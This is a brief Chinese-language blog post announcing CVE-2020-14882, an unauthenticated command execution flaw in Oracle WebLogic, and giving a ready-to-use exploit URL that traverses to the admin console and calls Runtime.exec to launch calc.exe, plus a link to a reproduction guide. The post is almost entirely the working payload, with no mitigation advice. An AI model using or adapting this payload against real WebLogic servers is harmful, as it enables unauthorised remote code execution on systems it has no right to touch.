1. Ma4ter Blog首页
  2. 漏洞预警

CVE-2020-14882 weblogic 未授权命令执行

weblogic rce
CVE-2020-14882 weblogic 未授权命令执行
Payload:

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(%22java.lang.Runtime.getRuntime().exec(%27calc.exe%27);%22); 

复现文档:https://mp.weixin.qq.com/s/48VIwTkyFVXUTS78kNByhg

原创文章,作者:Ma4ter,如若转载,请注明出处:https://ma4ter.cn/2279.html

发表评论

电子邮件地址不会被公开。 必填项已用*标注